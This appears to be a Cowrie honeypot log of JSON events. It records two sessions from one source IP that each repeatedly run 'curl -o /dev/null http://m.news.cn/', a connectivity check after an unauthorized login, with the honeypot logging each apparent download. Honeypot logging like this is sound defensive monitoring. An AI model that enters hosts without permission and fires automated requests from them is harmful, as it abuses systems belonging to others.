{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.860668Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.862460Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.863739Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.880543Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.881434Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.890854Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.900775Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.901644Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.904694Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.917455Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.923567Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.924498Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.926985Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.936474Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.937422Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.940910Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.961100Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.966423Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.967578Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.972032Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.973831Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.977413Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.978264Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.985237Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.002499Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.005905Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.008180Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.009126Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.012391Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.014260Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.014984Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.019735Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.036154Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.050748Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.051975Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.054708Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.055563Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.078356Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.083194Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.088798Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.090420Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.091775Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.094089Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.094825Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.098281Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.114383Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.129017Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.131464Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.132832Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.134771Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.135365Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.138639Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.151009Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.158970Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.162562Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.167636Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.168448Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.172590Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.173880Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.176203Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.177186Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.183333Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.184638Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.189710Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.192892Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.203356Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.204185Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.207432Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.208981Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.212821Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:53.217436Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:53.218206Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
